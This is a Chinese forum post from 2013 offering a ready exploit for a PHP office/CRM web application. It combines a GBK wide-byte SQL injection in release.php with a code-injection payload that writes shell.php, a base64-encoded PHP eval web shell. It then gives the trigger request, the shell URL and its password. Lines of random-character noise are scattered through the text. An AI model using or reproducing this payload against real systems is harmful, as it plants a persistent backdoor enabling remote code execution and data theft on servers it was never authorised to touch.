此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.
: O& Q- T' R3 f$ N& U) R# F; I! t9 ]7 L' @
5 j7 g& U6 \: d* c6 y! D
EXP:% Q: ?" ]# p. p2 A
+ ^, d! Z4 D Q) d$ D第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}
6 `8 ^( I' h+ E+ I" z
. P! A! k1 {' {* n6 `, ~第二步: [GET]http://site/general/email/index.php
* j& K0 I( j" x! f
! z1 J) X Z) f- O6 {7 ~SHELL: http://site/general/email/shell.php 密码C* R+ Y* @- A' ^8 F. X- o
, L. R. d& s% e
/ u7 K% s i+ q) w1 N* s- ^
此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好
3 E) m y8 N0 p( W$ ~& U+ ?
: Y- i+ v# Z$ y$ }1 a! W$ E9 \有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~
) V: v2 \7 Q; N) F! q, [6 a' V1 h
0 k6 d' ]' \9 V' l) T( S% r0 E# N3 W; M, U/ ?4 @+ Z$ [
|
发表于 2013-2-4 16:19:29
收藏
分享
支持
反对